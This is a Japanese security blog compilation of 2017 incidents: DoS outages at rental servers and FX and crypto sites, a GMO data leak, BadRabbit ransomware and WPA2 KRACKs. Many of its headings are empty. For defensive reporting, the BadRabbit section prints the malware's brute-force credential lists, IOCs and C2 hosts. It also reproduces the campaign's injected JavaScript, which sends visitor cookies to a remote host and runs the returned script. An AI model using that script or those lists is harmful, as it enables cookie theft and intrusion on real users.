2017年10月、11月の国内レンタルサーバー事業者へのDoS攻撃についてまとめてみた

2017年10月半ばから断続的に国内の複数のレンタルサーバー事業者がDoS攻撃を受けており、サーバーに接続できないなどのサービス障害が発生しています。DoS攻撃による障害は11月も継続して報告されています。ここでは関連情報をまとめます。

DoS攻撃の被害を訴える記事多数

10月20日頃から11月以降もDoS攻撃を受けてブログにアクセスができなかった等と報告する記事を44件確認した。(piyokango調べ)

ブログで報告されている主なレンタルサーバー事業者は次の通り。

同時期に次の事業者でDoS攻撃による障害報告も確認した。

レンタルサーバー事業者のDoS攻撃報告

先ほどの事業者で10月から11月にかけてDoS攻撃によるサービス障害の報告をまとめると次の通り。(11月11日時点)

f:id:Kango:20171111023301p:image

参考までに1年を通して障害状況が確認できた事業者で2017年DoS攻撃の報告件数を確認したところ次の通りとなった。

事業者10月20日以降の報告件数2017年に報告された件数
XSEVER43件68件
さくらインターネット25件51件
GMOクラウド7件10件
LOLIPOP!3件9件
StarServer2件10件

DoS攻撃批判記事対策の一環ではないかとの推測がある

DoS攻撃を用いたGoogleの検索表示への対策は次の手順を踏むものとみられる。

この方法が用いられたとみられる報告が上がっている。

DoS攻撃の影響を訴えるブログ

piyokangoが確認したDoS攻撃やその影響を報告している記事は次の通り。

更新履歴

サイトM&Aの情報漏えいについてまとめてみた

2017年10月30日、GMOインターネットは同社のサイト売買仲介サービス「サイトM&A」において、登録された会員情報等がインターネット上に流出していたことを発表しました。ここでは関連情報をまとめます。

インシデントタイムライン

日時出来事
2017年5月17日以前今回情報流出した会員情報の対象期間。
2017年8月30日 16時52分掲示板にインターネット上に置かれたZIPファイルのハイパーリンク(公開先A)が投稿される。
〃 17時4分掲示板にZIPファイルがGMOグループ関連の情報ではないかといった内容が投稿される。
2017年9月1日 15時59分掲示板にサイトM&AWebサイトのデータではないかといった投稿がされる。
あわせて公開されていたデータを別の場所(公開先B)にアップしたと投稿される。
2017年9月14日GMOインターネットへ情報漏えいの疑念があるとの外部からの連絡を受領。調査を開始。
2017年9月15日GMOインターネットが流出の事実を確認。インシデント対応を開始。
2017年9月19日GMOインターネット警視庁渋谷署に被害相談。
2017年9月27日システム再構築、安全面の確認作業完了。サイトM&Aを再開。
2017年10月26日GMOインターネットが郵送、及びメールで対象者へ報告。
2017年10月30日 10時59分Twitter上でGMOからの謝罪を郵送で受領したと画像付きで投稿される。*1
マスコミ各社がGMOから情報漏えいがあったと報道
〃 19時14分掲示板に別の場所(公開先C)にアップしたと投稿される。
GMOインターネットがサイトM&Aから情報漏えいがあったことをWebサイトで発表。
2017年11月1日3時22分掲示板に別の場所(公開先D)にアップしたと投稿される。
〃 9時40分掲示板に流出した情報がAmazonKindle Storeに出版されていると投稿される。
〃 13時頃GMOインターネットAmazon上での流出情報販売を把握。*2
〃 14時頃Amazonから販売されていた流出情報が削除される。*3
〃 (時間不明)GMOインターネットがサイトM&Aのサイトに情報漏えいがあったことを掲載。(10月30日発表と同じ)
2017年11月2日 2時25分掲示板に別の場所(公開先E)へのアップを示す内容が投稿される。

公式発表

被害の状況

流出した情報項目
流出対象外に係る情報

次に該当する場合は流出の対象に含まれない。

金銭情報や悪用に係る情報

インシデントの公表が遅れた理由

原因

GMOインターネットによる事故後の対応

今後取り組む施策

更新履歴

*1https://twitter.com/merlionsplash/status/924818112448364544

*2GMOから流出した個人情報、Amazon「Kindle」で電子書籍として販売 悪質な二次利用か,ねとらぼ,2017年11月2日アクセス

*3GMOインターネットから漏えいの個人情報、Amazonの電子書籍として販売される,ITpro,2017年11月1日アクセス

ランサムウェアBadRabbitに関する情報についてまとめてみた

2017年10月24日夜(日本時間)からウクライナやロシアを中心にランサムウェア「BadRabbit」に感染し、被害を受けたとの情報が出回っています。ここではBadRabbitに関連する情報についてまとめます。

タイムライン

日時出来事
2016年9月8日一連のキャンペーンに関連するとみられる通信先でRiskIQにより最初に観測された日。
2017年2月頃FireEyeが攻撃にも利用されたJavaScriptフレームワークを観測。*1
2017年10月6日アイカ工業のサーバー不正アクセスを受ける。
〃 17時2分アイカ工業のWebサイトが改ざんされる。
2017年10月9日アイカ工業のサーバー不正アクセスを受ける。
2017年10月24日 17時頃BadRabbitの拡散が始まる。
〃 21時26分InterfaxがTwitterを通じてWebサイト障害が発生していると報告。*2
〃 23時37分この日時までアイカ工業のWebサイトがされていた。
〃 24時頃BadRabbitの拡散を行っていたWebサイトが停止する。
ウクライナのCERT-UAがさらなる攻撃の可能性があるとして注意喚起。*3
US-CERTがBadRabbitによる感染報告を複数受けているとして情報公開。*4
2017年10月25日 1時ウクライナ保安庁が同国内で確認されたインシデントに対する情報提供、及び注意喚起。*5
海外のセキュリティソフト会社よりアイカ工業のWebサイトサイバー攻撃悪用の疑いがあると情報発信。*6
〃 12時17分アイカ工業は同社Webサイトを一時閉鎖。
2017年10月26日 8時45分アイカ工業はWebサイトへ攻撃の疑いがあると発表。
〃 15時30分アイカ工業はWebサイトが一時的に改ざんされた痕跡を確認と発表。
〃 17時頃IPAがBadRabbitに対して注意喚起。*7
〃 22時20分Cisco(Talos)がBadRabbitの拡散機能にEternalRomanceが利用されていると指摘。
2017年11月2日 19時10分アイカ工業が続報としてWebサイトが改ざんされていた可能性がある期間を発表。
2017年11月20日 9時アイカ工業がWebサイトを再開。最終報を発表。

被害状況

BadRabbitの影響を受けたとみられる具体名が出ている組織
組織名被害・影響の概要
インタファクス通信ロシアWebサイトなどの一部のサービスに障害発生。
フォンタンカ出版ロシアサーバーが攻撃を受け障害発生。*8
オデッサ国際空港ウクライナ職員が旅客データを手入力による対応に変更となった。
これを受け当該空港を利用する数便に遅れが生じた。
キエフ地下鉄ウクライナ決済システムで障害が発生した。列車運行への影響はなかった。
セキュリティ組織の把握状況
セキュリティ組織把握している被害状況
NCSCBadRabbitの影響を受けた報告は一切受けていない。*9
IPA多くの機関において業務に支障が出るなどの深刻な影響が発生している。
ESET被害の半分以上はロシアで発生。
観測された割合はロシア65%、ウクライナ12.2%、ブルガリア10.2%、トルコ6.4%、日本3.8%、その他2.4%
KasperskyKSNの統計では全体として約200の端末で攻撃を確認。
大半はロシア。この他にウクライナ、トルコ、ドイツ等でも確認している。
TrendMicroSPNの統計では日本国内での検出は確認されていない。
改ざんされたサイトはデンマーク、アイルランド、トルコ、ロシアで確認。
25日17時半時点でロシア110台、カザフスタン3台、ウクライナ1台の計114台をブロックした。
Symantec感染試行の検出の大半はロシアで最初に現れてから2時間後に発生。
感染試行の国別の検出状況はロシア86%、日本3%、ブルガリア2%、ウクライナ1%、アメリカ1%、その他7%
Avast15か国のユーザーでBadRabbitを検出
それぞれの検出率はロシアが71%、ウクライナ14%、ブルガリア8%。
ポーランド、US、ルーマニアなどでも検出しているが1%以下。
日本国内の状況

ランサムウェア「BadRabbit」について

感染デモ動画
BadRabbitと呼ばれる由来

感染経路(1):改ざんされたサイトの閲覧による感染
感染経路(2):BadRabbitの拡散機能による感染

認証試行に用いられるユーザーID文字列

Administrator,Admin,Guest,User,User1,user-1Test,root,buh,boss,ftp,rdp,rdpuser,rdpadmin,manager,

support,work,other user,operator,backup,asus,ftpuser,ftpadmin,nas,nasuser,nasadmin,superuser,netguest,alex

認証試行に用いられるパスワード文字列

Administrator,administrator,Guest,guest,User,user,Admin,adminTest,test,root,123,1234,12345,123456,1234567,

12345678,123456789,1234567890,Administrator123,administrator123,Guest123,guest123,User123,user123,Admin123,

admin123Test123,test123,password,111111,55555,77777,777,qwe,qwe123,qwe321,qwer,qwert,qwerty,qwerty123,zxc,

zxc123,zxc321,zxcv,uiop,123321,321,love,secret,sex,god

BadRabbitの暗号化機能

暗号化される対象の拡張子

.3ds .7z .accdb .ai .asm .asp .aspx .avhd .back .bak .bmp .brw .c .cab .cc .cer .cfg .conf .cpp .crt .cs .ctl .cxx .dbf .der .dib .disk .djvu .doc .docx .dwg .eml .fdb .gz .h .hdd .hpp .hxx .iso .java .jfif .jpe .jpeg .jpg .js .kdbx .key .mail .mdb .msg .nrg .odc .odf .odg .odi .odm .odp .ods .odt .ora .ost .ova .ovf .p12 .p7b .p7c .pdf .pem .pfx .php .pmf .png .ppt .pptx .ps1 .pst .pvi .py .pyc .pyw .qcow .qcow2 .rar .rb .rtf .scm .sln .sql .tar .tib .tif .tiff .vb .vbox .vbs .vcb .vdi .vfd .vhd .vhdx .vmc .vmdk .vmsd .vmtm .vmx .vsdx .vsv .work .xls .xlsx .xml .xvd .zip

組み込まれたRSA-2048の公開鍵

MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB

この他に実装されている機能など

ジョブ名などに登場する文字列

ジョブ名等の文字列Game Of Thronesでの役割ジョブの動き
rhaegalRhaegar Targaryen王子にちなんで名づけられた。3匹のドラゴンの1つ。dispci.exeとdrogon.jobを実行する。
dorogonKhal Drogoにちなんで名づけられた。3匹のドラゴンの1つ。PCをシャットダウンし、暗号化を実行。身代金文書を表示する。
viserion
(viserion_)
Night Kingが殺されワイトとして復活したドラゴン。3匹のドラゴンの1つ。2度目の再起動時に実行。スクリーンロックし、身代金要求画面を表示。
GrayWormKasperskyによれば登場人物との紹介されているが、同名の人物は存在しないとみられる。
似た名前として同作に登場する司令官Grey Wormが存在する。
BadRabbitのキルスイッチ

c:\windows\infpub.dat

C:\Windows\cscc.dat

過去観測されたランサムウェアとの関連性分析

コメント元対象のランサムウェア関連の有無見解
Group-IBNotPetya肯定NotPetyaを修正したものと解析している。
ESETPetya肯定Petya(Penza)の変種と解析している。
KasperskyNotPetya肯定コードの一部の一致、ドメインのリストが同一、拡散方法が類似等から背後にいる関係者は同じとの見方。
IntezerLabsNotPetya否定?同社リサーチャーはコードの類似率は13%であると分析。*18
PwCNotPetya肯定同社脅威アナリストはNotPetyaとBadRabbitの表層的な差異分析をした結果、両者に密接な関連がみられる*19
BitdefenderGoldenEye/NotPetya肯定構造的に、そしてより広い焦点からも極めて似ている。
Cisco(Talos)NotPetya(Nyetya)肯定BadRabbitとNyetyaのコアコードは同じベース上に構築されている。
両マルウェアのビルドツールチェーンは非常に似ている。
絶対的なつながりを示す証拠はないが両マルウェアの作成者は同じであるといった確信を持っている。
@Adam_CyberNotPetya肯定DLLを共有かつ67%が同一のコードベースである。
これら攻撃は同じスレットアクターが背後にいる可能性。*20

改ざんされた恐れのあるサイト一覧にアイカ工業のドメイン名が含まれる

経緯
改ざんの状況

BadRabbit関連情報(IOC情報)

ファイル
ファイル名機能Sha256
install_flash_player.exe
FlashUtil.exe
ドロッパー630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da
infpub.datdispci.exeの起動タスクを作成。
RSA暗号を利用して対象ファイルを暗号化。
579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648
141d45d650580ed4b0d0fc4b8fd5448da67b30afbe07781da02c39d345a8f4a0
dispci.exe別のブートローダーをインストール。
マシンを起動不可とする。
8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93
cscc.dat32ビット版のDiskCryptor用ドライバ682ADCB55FE4649F7B22505A54A9DBC454B4090FC2BB84AF7DB5B0908F3B7806
64ビット版のDiskCryptor用ドライバ0b2f863f4119dc88a22cc97c0a136c88a0127cb026751303b045f7322a8972f6
Mimikatz32ビット版のmimikatz 亜種2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035
64ビット版のmimikatz 亜種301b905eb98d8d6bb559c04bbda26628a942b2c4107c07a02e8f753bdcfe347c
BadRabbit関連の通信先
種別通信先
埋め込まれていた通信先(1)185.149.120[.]3
埋め込まれていた通信先(2)172.97.69[.]79 (dfkiueswbgfreiwfsd[.]tk)
埋め込まれていた通信先(3)91.236.116[.]50
埋め込まれていた通信先(4)38.84.134[.]15
ドロッパー配布元1dnscontrol[.]com/flash_install.php (5[.]61[.]37[.]209)
ペイメント先caforssztxqzf2nm[.]onion
同じキャンペーンで利用の恐れがある通信先(ESET)webcheck01[.]net
webdefense1[.]net
secure-check[.]host
firewebmail[.]com
secureinbox[.]email
secure-dns1[.]net
改ざんされていた恐れのあるWebサイト

aica[.]co[.]jp

www[.]dermavieskin[.]com

grupovo[.]bg

www[.]fitnes-trener[.]com[.]ua

www[.]afaceri-poligrafice[.]ro

grandua[.]ua

i24[.]com[.]ua

scanstockphoto[.]com

izgodni[.]bg

www[.]biotechusa[.]ru

www[.]mediaport[.]ua

www[.]armoniacenter[.]com

sweet-home[.]dn[.]ua

www[.]chnu[.]edu[.]ua

fitnes-trener[.]com[.]ua

www[.]t[.]ks[.]ua

www[.]fastfwd[.]ru

www[.]uscc[.]ua

bitte[.]net[.]ua

www[.]fitnes-trener[.]com[.]ua

ophthalmolog[.]kiev[.]ua

grandua[.]ua

i24[.]com[.]ua

akvadom[.]kiev[.]ua

ulianarudich[.]com[.]ua

football[.]zp[.]ua

www[.]mediaport[.]ua

chnu[.]edu[.]ua

evroremont[.]kharkov[.]ua

thecovershop[.]pl

www[.]tofisa[.]com

cream-dream[.]com[.]ua

go2odessa[.]ru

bahmut[.]com[.]ua

abantyoreselurunler[.]com

aldingareefretreat[.]com

ftp9[.]net

magicofis[.]com

piiz[.]tk

tedizmir[.]k12[.]tr

websgramly[.]com

www[.]andronova[.]net

www[.]detaymaxinet[.]com

www[.]fikracenneti[.]com

www[.]gulenturizm[.]com[.]tr

www[.]ilgihastanesi[.]com

www[.]komedibahane[.]com

www[.]moonlightcinemaclub[.]com

www[.]musterihizmetlerinumarasi[.]com

www[.]techkafa[.]net

www[.]teknolojihaber[.]net

www[.]vertizontal[.]ro

izgodni[.]bg

montenegro-today[.]com

scanstockphoto[.]com

www[.]grupovo[.]bg

www[.]matasedita[.]sk

www[.]montenegro-today[.]com

www[.]myk104[.]com

www[.]nadupanyfanusik[.]sk

www[.]otbrana[.]com

www[.]sinematurk[.]com

www[.]ucarsoft[.]com

ペイメント先 Bitcoin ウォレット (公開されているもの)
キャンペーンに利用されたJavaScript
var REMOTE_URL = ‘<INJECTION HOST URL>’;
var C_TIMEOUT = 20000;
function analyze_traffic() {
   return {
       ‘Tr.Referer’: document.referrer,
       ‘Tr.Agent’: navigator.userAgent,
       ‘Tr.CookieState’: !!document.cookie,
       ‘Tr.Cookie’: document.cookie,
       ‘Tr.Domen’: window.location.hostname
   };
}

function execute_request(post, url, callback) {
   var xhr = init_xhr();
   if (!!xhr) {
       xhr.open(‘POST’, url);
       xhr.timeout = C_TIMEOUT;
       xhr.setRequestHeader(‘Content-Type’, ‘application/x-www-form-urlencoded’);
       xhr.onreadystatechange = function () {
           if (xhr.readyState == 4 && xhr.status == 200) {
               callback(xhr.responseText);
           }
       };
       var content = build_query(post);
       xhr.send(content);
   }
}

function apply_payload(response) {
   if (response) {
       var json_result = JSON.parse(response);
       if (json_result) {
           var inject_string = urldecode(json_result.InjectionString);
           if (json_result.InjectionType === 1) {
               window.location = inject_string;
           } else {
               write_on_page(inject_string);
           }
       }
   }
}

function write_on_page(content) {
   var div = document.createElement(‘div’);
   div.id = ‘response’;
   div.innerHTML = content;
   document.body.appendChild(div);
   var scripts = div.getElementsByTagName(‘script’);
   if (scripts.length > 0) {
       for (var i = 0; i < scripts.length; i++) {
           var script = document.createElement(‘script’);
           script.innerHTML = scripts[i].innerHTML;
           document.body.appendChild(script);
           scripts[i].parentNode.removeChild(scripts[i]);
       }
   }
}

function build_query(post) {
   var post_query = [];
   for (var k in post) {
       if (post.hasOwnProperty(k)) {
           post_query.push(k + ‘=’ + post[k]);
       }
   }
   return post_query.join(‘&’);
}

function init_xhr() {
   if (!!window.XMLHttpRequest) {
       return new XMLHttpRequest();
   } else if (!!window.ActiveXObject) {
       var xhr_array = [
           ‘Msxml2.XMLHTTP.6.0’,
           ‘Msxml2.XMLHTTP.3.0’,
           ‘Msxml2.XMLHTTP’,
           ‘Microsoft.XMLHTTP’
       ];
       for (var i = 0; i < xhr_array.length; i++) {
           try {
               return new ActiveXObject(xhr_array[i]);
           }
           catch (e) {
           }
       }
   }
}

function urldecode(data) {
   return decodeURIComponent(data).replace(/\+/g, ‘%20’);
}

// Execute request
var traffic = analyze_traffic();
execute_request(traffic, REMOTE_URL, apply_payload);

参考情報(報道、解析、まとめ等)

全国紙・ブロック紙
報道日付新聞社記事名
2017年10月25日朝刊日本経済新聞地下鉄や空港にサイバー攻撃
2017年10月25日夕刊毎日新聞大規模サイバー攻撃 身代金ウイルス 日露欧に被害 (共同)
2017年10月25日夕刊東京新聞ロシアや日本などに大規模サイバー攻撃 身代金ウイルス感染 (共同)
2017年10月26日朝刊産経新聞日本や露にサイバー攻撃 ウクライナ 空港・地下鉄被害
セキュリティ組織
その他

更新履歴

*1国内でも「Bad Rabbit」を観測 - 2月には誘導スクリプトが稼働か,Security NEXT,2017年10月25日アクセス

*2https://twitter.com/interfax_news/status/922799045088829442

*3Кібератака 24.10.2017

*4Multiple Ransomware Infections Reported

*5СБУ блокувала подальше розповсюдження комп’ютерного вірусу

*6アイカ工業にサイバー攻撃 サイト停止、不正改ざんの疑い,共同通信,2017年10月26日アクセス

*7https://twitter.com/IPAjp/status/923464685340340224

*8:Вирус-шифровальщик атаковал российские СМИ,Ведомости,2017年10月26日アクセス

*9Bad Rabbit: Game of Thrones-referencing ransomware hits Europe,thegurdian,2017年10月26日アクセス

*10ロシアなど複数国でサイバー攻撃、大きな障害なし,TBS,2017年10月25日アクセス

*11ロシアなどに新たなサイバー攻撃、日本でも被害,Reuters,2017年10月25日アクセス

*12https://twitter.com/bartblaze/status/922866774693044224

*13https://twitter.com/MaartenVDantzig/status/922854232176422912

*14https://twitter.com/LukasStefanko/status/922916146856189952

*15https://twitter.com/fwosar/status/922866144549228545

*16https://twitter.com/0xAmit/status/922871446602502145

*17https://twitter.com/0xAmit/status/922872657116368897

*18https://twitter.com/jaytezer/status/922875751174758400

*19個人ブログにて指摘

*20https://twitter.com/Adam_Cyber/status/922930877109362694

*21アイカ工業がWebサイトを一時閉鎖、Bad Rabbitが原因か,ITpro,2017年10月26日アクセス

*22不正アクセス アイカ工業サイトに改ざんの痕跡 HP停止,毎日新聞,2017年10月27日アクセス

*23アイカ工業、サイバー攻撃の疑いで閉鎖中だったWebサイトを再開,ITPro,2017年11月21日アクセス

WPA2の脆弱性 KRACKsについてまとめてみた

2017年10月16日、WPA2のプロトコルに欠陥が確認され盗聴や改ざんの恐れがあるとして脆弱性情報が公開されました。発見者によりこの脆弱性は「KRACKs」と呼称されています。ここでは脆弱性の関連情報をまとめます。

脆弱性タイムライン

日時出来事
2017年5月19日Vanhoef氏が研究論文を提出。
2017年7月14日頃Vanhoef氏が脆弱性の実験をした製品開発ベンダへ連絡。
その後Vanhoef氏が影響範囲の広さを認識し、CERT/CCと協力し脆弱性情報を開示。
2017年8月24日ラスベガスで開催されたBlackhatでVanhoef氏が関連研究を発表
2017年8月28日CERT/CCから複数の開発ベンダ*1に通知。
2017年10月6日BlackhatのTwitterアカウントがWPA2をテーマとした発表があるとツイート。
2017年10月16日SNSなどでKRACKsが話題となり、Vanhoef氏が反響に驚いているとコメント。
同日Wi-Fi AllianceがソフトウェアアップデートでKRACKsが解決可能と発表
同日KRACKsの脆弱性の詳細情報が公開される。
2017年10月18日IPA総務省がKRACKsに関連するセキュリティ情報を公開。
2017年11月1日Vanhoef氏がKRACKsの背景である研究論文をダラスのCCSで発表。
2017年11月8日Vanhoef氏がKRACKsクライアント向け検証コード公開。*2
2017年12月Blackhat EU(ロンドン)でVanhoef氏がKRACKsについて発表予定。

脆弱性の概要

対象Wi-Fi Protected Access II (WPA2)
影響暗号化されたデータの複号による盗聴
特定の暗号化利用時における通信内容の改ざん
通称KRACKs またはKRACK (Key Reinstallation Attacks:鍵再インストール攻撃)
PoCクライアントへの影響有無チェックツール公開あり
CVE-2017-13082のAPへの影響有無チェックツール公開あり
デモ動画あり
悪用の状況観測情報なし(2017/10/16)-Symantec,Wifi Alliance
ロゴあり
発見者/報告者Mathy Vanhoef氏 (@vanhoefm)
発見者による情報公開
対象のCVE一覧

KRACKsの脆弱性として全部で10件のCVEが発行されている。

CVE概要
CVE-2017-130774way Handshakeにおけるペア暗号鍵(PTK-TK)の再インストール
CVE-2017-130784way Handshakeでのグループ鍵(GTK)の再インストール
CVE-2017-130794way Handshakeにおける整合性グループ鍵(IGTK)の再インストール
CVE-2017-13080Group Key Handshakeにおけるグループ鍵(GTK)の再インストール
CVE-2017-13081Group Key Handshakeにおける整合性グループ鍵(IGTK)の再インストール
CVE-2017-13082再送されたFast BSS Transition Reassociation Requestを受け入れ、処理中におけるペア暗号鍵の再インストール
CVE-2017-13084PeerKey HandshakeにおけるSTK鍵の再インストール
CVE-2017-13086TDLS HandshakeにおけるTunneled Direct-Link Setup PeerKey(TPK)の再インストール
CVE-2017-13087ワイヤレスネットワーク管理(WNM)スリープモードレスポンスフレームを処理中におけるグループ鍵(GTK)の再インストール
CVE-2017-13088ワイヤレスネットワーク管理(WNM)スリープモードレスポンスフレームを処理中における整合性グループ鍵(IGTK)の再インストール
攻撃タイプCVE影響を受ける対象デバイス
4way HandshakeCVE-2017-13077Wifiクライアント
Group Key HandshakeCVE-2017-13078/13079/13080/13081/13087/13088Wifiクライアント
802.11r FTCVE-2017-13082アクセスポイント
PeerKey HandshakeCVE-2017-13084/13086Wifiクライアント

KRACKsによる影響とその範囲

攻撃の前提条件

影響対象の調査とその対策

回避策
影響を受ける製品
ベンダ対策状況、ベンダの案内等
Microsoft2017年10月10日のセキュリティアップデートで修正済み。(脆弱性情報の詳細)
Google2017年11月6日のセキュリティパッチレベルで修正。
Apple2017年10月31日付の更新で修正。macOS,iOS,tvOS,watchOSが対象。
iPhone 5s〜iPhone 7 / iPhone SE / iPad Air以降 / 第6世代iPod TouchはVE-2017-13077、13078の影響を受けない。CVE-2017-13080も同様かは不明。
Arch Linuxwpa_supplicant 1:2.6-11: security update
hostapd 2.6-6 (security update)
Aruba NetworksARUBA-PSA-2017-007
WPA2 Vulnerability Discussion
【お知らせ】Wi-Fiの暗号化技術「WPA2」脆弱性対策について
CiscoMultiple Vulnerabilities in Wi-Fi Protected Access and Wi-Fi Protected Access II
Cisco Meraki802.11r Vulnerability (CVE: 2017-13082) FAQ
CloudTraxSecurity Notice: Key Reinstallation Attack
CZ.NICMajor WPA2 vulnerability to be disclosed
DD-WRTチェンジセット 33525
DebianDSA-3999-1 wpa -- security update
Espressif SystemsEspressif Releases Patches for WiFi Vulnerabilities (CERT VU#228519)
Extreme NetworksVN 2017-005 - KRACK, WPA2 Protocol Flaw
FedoraFEDORA-2017-f45e844a85
Fortinet[PDF] FortiAP 5.6.1 Release Notes
FreeBSD ProjectFreeBSD Security Notice: WPA2 vulnerabilities
HostAPN/A (CERT/CC listed)
Intel CorporationOne or more Intel Products affected by the Wi-Fi Protected Access II (WPA2) protocol vulnerability
Juniper NetworksN/A (CERT/CC listed)
KPNBeveiligingsonderzoekers vinden kwetsbaarheid in wifi-protocol
LEDEKRACK (Key Reinstallation Attacks), now patched upstream in hostapd
LineageOShttps://review.lineageos.org/#/q/topic:krack-n
Microchip TechnologyVU#228519 - Wi-Fi Protected Access II (WPA2) Vulnerabilities
NETGEAR【重要】弊社無線製品のWPA2脆弱性対応状況について
WPA2 脆弱性 セキュリティアドバイザリー (PSV-2017-2826, PSV-2017-2836, PSV-2017-2837)
Security Advisory for WPA-2 Vulnerabilities, PSV-2017-2826, PSV-2017-2836, PSV-2017-2837
OpenBSDOpenBSD Errata: August 30th, 2017 (net80211)
PeplinkSecurity Advisory: KRACK WPA2 Vulnerability (VU#228519)
pfSenseWPA2 issue (KRACK)
RedhatKRACKs - wpa_supplicant Multiple Vulnerabilities
rivebed[PDF] Security Advisory KRACK WPA/WPA2 Vulnerability
SophosAdvisory Sophos Wireless affected by WPA and WPA2 vulnerabilities with key reinstallation attacks (KRACKs)
SUSEBug 1063479 - VUL-0: hostap: WPA2 attacks (VU#228519) aka ”KRACK”
SynologySynology-SA-17:60 KRACK
TP-LinkWPA2 セキュリティの脆弱性に関して(KRACKs)
Severe flaws called ”KRACK” are discovered in the WPA2 protocol
Ubiquiti Networks3.9.3.7537 for UAP/USW has been released
ubuntuUbuntu Security Notice USN-3455-1
WatchGuardWPA and WPA2 Vulnerabilities Update
WPA と WPA2 の脆弱性に関する最新情報
Zyxel CommunicationsZyxel security advisory for the key management vulnerabilities of WPA2 protocol
IODATAWPA2の脆弱性に関する弊社調査・対応状況について
BUFFALO無線LAN製品のWPA2の脆弱性について
ヤマハ「Wi-Fi Protected Access II (WPA2) ハンドシェイクにおいて Nonce およびセッション鍵が再利用される問題」について
アライドテレシスWi-Fi Protected Access II (WPA2) ハンドシェイクに関する脆弱性
D-link japan「WPA2の脆弱性」 に関する弊社調査状況について
ELECOMWPA2の脆弱性に関する弊社調査・対応状況について
日本電気【重要】「WPA2」の脆弱性に関するお知らせ
無線LAN(Wi-Fi)通信規格 WPA2における複数の脆弱性について
富士通N/A(JVN listed)
東芝デバイス&ストレージN/A(JVN listed)
東芝メモリ無線LAN搭載 SDメモリカード/FlashAir™における「WPA2の鍵情報の生成・管理に関する脆弱性」について
PLANEXWPA2の脆弱性への対応についてのお知らせ
フルノシステムズ【重要なお知らせ】無線LAN製品のWPA2の脆弱性に関するお知らせ
【重要なお知らせ】無線ハンディターミナル製品のWPA2の脆弱性に関するお知らせ
影響を受けない製品

KRACKsの調査、まとめ、注意喚起など

全国紙、テレビ等での報道

報道日付/記事名
NHK2017年10月17日 ニュースチェック11 トレンド「無線LAN」
2017年10月18日 ニュースチェック11 世界で使用 "Wi-Fi"規格に欠陥
日本経済新聞2017年10月17日夕刊 Wi-Fi 深刻な脆弱性 最新暗号方式修正ソフトを配布
2017年10月18日朝刊 Wi-Fi 深刻な脆弱性 IoT基盤に不安
2017年10月19日朝刊 ソフト更新呼びかけ Wi-Fi機器で総務省
読売新聞2017年10月18日朝刊 WiFi暗号化に弱点 攻撃される条件 限定的
毎日新聞2017年10月18日朝刊 無線LAN 深刻な欠陥 「暗号鍵」ハッキング メール盗み見も
産経新聞2017年10月18日朝刊 無線LANに申告欠陥 暗号化関連の技術 注意喚起
朝日新聞2017年10月19日朝刊 Wi-Fi暗号に申告な欠陥

更新履歴

*1報道では約100組織

*2https://twitter.com/vanhoefm/status/928117439631642625

*3Microsoft Quietly Patched the Krack WPA2 Vulnerability Last Week,BLEEPINGCOMPUTER,2017年10月17日アクセス

*4Microsoft has already fixed the Wi-Fi attack vulnerability,THE VERGE,2017年10月17日アクセス

仮想通貨取引所やFXサイトへのDoS攻撃についてまとめてみた

2017年9月14日頃から国内の仮想通貨やFXを取り扱う複数のサイトでDDoS攻撃と見られる大量のアクセスを受けたことによる障害が発生したと発表しています。これら確認されているDoS攻撃が同一の攻撃元かどうかは不明です。

ここでは関連情報をまとめます。

No区分障害発生元障害発生日時復旧日時原因リリース等
1FXマネーパートナーズ9月14日9時10分頃9月14日13時10分DDoS攻撃【続報3】当社取引システム並びにホームページにおける動作確認のお知らせ
当社取引システム並びにホームページにおける動作確認のお知らせ
9月14・15日に発生したサイバー攻撃について
2FXDMM9月15日7時24分9月15日8時40分−(記載無し)ログインがしづらい事象について
【続報・復旧】ログインがしづらい事象について
3仮想通貨テックビューロ9月15日9時頃9月15日19時40分頃DDoS攻撃本日発生したアクセスしにくい現象に関するご報告
4FXFXトレード・フィナンシャル9月16日9時53分9月19日12時見込DDoS攻撃当社システムに対するDDoS攻撃について
5仮想通貨みんなのビットコイン9月18日8時頃9月18日21時頃DDoS攻撃ユーザーと見られるTweetその1Tweetその2
6FXヒロセ通商(1回目)9月18日10時15分9月18日11時28分DDoS攻撃本日発生しました障害について
7FXJFX9月18日10時15分9月18日11時28分DDoS攻撃本日発生しました障害について
8FXヒロセ通商(2回目)9月19日9時54分9月19日17時57分DDoS攻撃当社ホームページへのアクセスについて
9仮想通貨ビットフライヤー(1回目)9月20日17時46分9月20日22時50分(報道)DDoS攻撃Twitterでの報告
10FXデューカスコピー・ジャパン9月21日4時00分9月21日5時44分DDoS攻撃9月20日以降に発生したサイバー攻撃について
11FXコムテックス9月21日8時前9月22日0時頃決済代行業者へのDDoS攻撃Twitterでの報告
12FX外為どっとコム9月21日9時15分9月21日10時00分DDoS攻撃の可能性トップページ掲載(魚拓)
Twitterでの報告
13FX東洋証券9月21日9月21日10時00分DDoS攻撃ネット入金サービス障害のお知らせ
ネット入金サービス障害【復旧】のお知らせ
14FX上田ハーロー9月21日10時15分頃−(発表無し)DDoS攻撃の可能性9月21日、22日の弊社ホームページアクセス状況につきまして
15FXインヴァスト証券9月21日8時頃9月21日9時30分頃決済代行業者へのDDoS攻撃Myページおよび即時入金の復旧のお知らせ
16仮想通貨BTCボックス9月21日18時頃9月21日18時20分−(発表無し)9月21日 アクセス状況について
17FXデューカスコピー・ジャパン9月21日18時15分9月21日18時30分DDoS攻撃9月20日以降に発生したサイバー攻撃について
18FXデューカスコピー・ジャパン9月21日18時50分9月21日18時59分DDoS攻撃9月20日以降に発生したサイバー攻撃について
